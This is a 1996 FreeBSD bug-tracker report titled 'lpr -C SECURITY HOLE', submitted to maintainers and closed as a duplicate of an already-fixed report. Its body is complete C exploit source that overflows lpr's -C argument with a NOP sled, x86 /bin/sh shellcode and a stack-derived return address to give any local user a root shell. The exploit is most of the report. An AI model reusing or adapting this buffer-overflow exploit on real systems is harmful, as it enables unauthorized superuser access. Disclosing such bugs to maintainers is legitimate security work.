From ks@itp.ac.ru  Tue Nov 19 23:58:21 1996
Received: from itp.ac.ru (itp.ac.ru [193.233.32.4])
          by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id XAA12251
          for <FreeBSD-gnats-submit@freebsd.org>; Tue, 19 Nov 1996 23:57:53 -0800 (PST)
Received: (ks@localhost) by itp.ac.ru (8.6.11/8.6.5) id LAA29022; Wed, 20 Nov 1996 11:04:48 +0300
Message-Id: <199611200804.LAA29022@itp.ac.ru>
Date: Wed, 20 Nov 1996 11:04:48 +0300
From: ks@itp.ac.ru
Reply-To: ks@itp.ac.ru
To: FreeBSD-gnats-submit@freebsd.org
Subject: lpr -C SECURITY HOLE!!! ROOT SHELL GAIN !!!!
X-Send-Pr-Version: 3.2

>Number:         2070
>Category:       bin
>Synopsis:       lpr -C SECURITY HOLE!!! ROOT SHELL GAIN !!!!
>Confidential:   no
>Severity:       serious
>Priority:       medium
>Responsible:    gnats-admin
>State:          closed
>Quarter:        
>Keywords:       
>Date-Required:  
>Class:          sw-bug
>Submitter-Id:   current-users
>Arrival-Date:   Wed Nov 20 00:00:02 PST 1996
>Closed-Date:    Wed Nov 27 19:39:09 PST 1996
>Last-Modified:  Mon Jul 05 15:50:55 GMT 2004
>Originator:     Sergey S. Kosyakov
>Release:        
>Organization:
>Environment:

	

>Description:

  I casually find simple code (the text is below) which gain any
registered user shell with superuser privileges. 
The text:

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   char execshell[] =
   "\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
   "\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
   "\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
   "\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}

Sergey Kosyakov
Presidium of Science Park in Chernogolovka of Russian Academy of Science,
Chernogolovka,
Moscow Region,
142432 Russia

E-Mail: ks@itp.ac.ru
Phone:  +7 (095) 7029317
Fax:    +7 (095) 9132317

>How-To-Repeat:

>Fix:

>Release-Note:
>Audit-Trail:
State-Changed-From-To: open->closed 
State-Changed-By: fenner 
State-Changed-When: Wed Nov 27 19:39:09 PST 1996 
State-Changed-Why:  
This is a duplicate for PR #1863, and was fixed on October 27. 
>Unformatted:
